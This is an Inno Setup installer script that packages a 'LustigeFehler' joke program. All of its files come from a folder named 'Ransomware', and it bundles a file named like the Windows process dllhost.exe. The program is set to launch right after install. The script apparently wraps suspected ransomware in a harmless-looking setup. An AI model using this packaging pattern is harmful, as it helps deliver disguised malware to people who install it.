; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!

#define MyAppName "LustigeFehler"
#define MyAppVersion "1.0.0.0"
#define MyAppPublisher "JokeCookie"
#define MyAppURL "www.boerse.to"
#define MyAppExeName "LustigeFehler.exe"

[Setup]
; NOTE: The value of AppId uniquely identifies this application.
; Do not use the same AppId value in installers for other applications.
; (To generate a new GUID, click Tools | Generate GUID inside the IDE.)
AppId={{C251C179-49D0-46FD-A334-0C1333A0F9B1}
AppName={#MyAppName}
AppVersion={#MyAppVersion}
VersionInfoProductVersion={#MyAppVersion}
VersionInfoVersion={#MyAppVersion}
;AppVerName={#MyAppName} {#MyAppVersion}
AppPublisher={#MyAppPublisher}
AppPublisherURL={#MyAppURL}
AppSupportURL={#MyAppURL}
AppUpdatesURL={#MyAppURL}
DefaultDirName={pf}\{#MyAppName}
DefaultGroupName={#MyAppName}
AllowNoIcons=yes
LicenseFile=C:\Users\tim\Desktop\Ransomware\BeforeSetup\License.txt
OutputDir=C:\Users\tim\Desktop\Ransomware\Setup
OutputBaseFilename=LustigeFehler-Setup
SetupIconFile=C:\Users\tim\Desktop\Ransomware\BeforeSetup\Funny.ico
Compression=lzma
SolidCompression=yes

[Languages]
Name: "english"; MessagesFile: "compiler:Default.isl"
Name: "german"; MessagesFile: "compiler:Languages\German.isl"

[Tasks]
Name: "desktopicon"; Description: "{cm:CreateDesktopIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked
Name: "quicklaunchicon"; Description: "{cm:CreateQuickLaunchIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked; OnlyBelowVersion: 0,6.1

[Files]
Source: "C:\Users\tim\Desktop\Ransomware\BeforeSetup\LustigeFehler.exe"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\Users\tim\Desktop\Ransomware\BeforeSetup\Config.xml"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\Users\tim\Desktop\Ransomware\BeforeSetup\dllhost.exe"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\Users\tim\Desktop\Ransomware\BeforeSetup\Funny.ico"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\Users\tim\Desktop\Ransomware\BeforeSetup\License.txt"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\Users\tim\Desktop\Ransomware\BeforeSetup\msvpc.dll"; DestDir: "{app}"; Flags: ignoreversion
; NOTE: Don't use "Flags: ignoreversion" on any shared system files

[Icons]
Name: "{group}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"
Name: "{group}\{cm:UninstallProgram,{#MyAppName}}"; Filename: "{uninstallexe}"
Name: "{commondesktop}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"; Tasks: desktopicon
Name: "{userappdata}\Microsoft\Internet Explorer\Quick Launch\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"; Tasks: quicklaunchicon

[Run]
Filename: "{app}\{#MyAppExeName}"; Description: "{cm:LaunchProgram,{#StringChange(MyAppName, '&', '&&')}}"; Flags: nowait postinstall skipifsilent

